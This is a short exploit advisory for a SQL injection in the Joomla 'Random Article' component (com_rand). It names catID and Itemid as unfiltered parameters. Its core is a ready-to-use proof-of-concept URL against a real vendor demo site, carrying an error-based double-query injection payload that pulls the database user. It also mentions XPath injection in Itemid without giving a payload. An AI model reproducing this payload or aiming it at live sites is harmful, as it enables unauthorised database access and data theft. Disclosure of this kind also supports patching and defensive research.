##################################################################################################
#Exploit Title : Joomla Random Article Component SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : http://demo.web-dorado.com
#Date          : 23/03/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


joomla component " Random Article" is not filtering data in catID and Itemid parameters before passing it to
SQL query,hence it is vulnerable to SQL injection. 

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is in catID and Itemid parameter 


////////////////
///  POC   ////
///////////////


SQL Injection in catID parameter
=================================

Use error based double query injection with catID parameter

Injected Link--->

http://demo.web-dorado.com

Like error based double query injection for exploiting username --->
http://demo.web-dorado.com/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 



SQL Injection in Itemid parameter
=================================

Itemid Parameter is exploitable using xpath injection
 
http://demo.web-dorado.com

###################################################################################################

           --==[[Special Thanks to]]==--

                #  Manish Kishan Tanwar  ^_^ #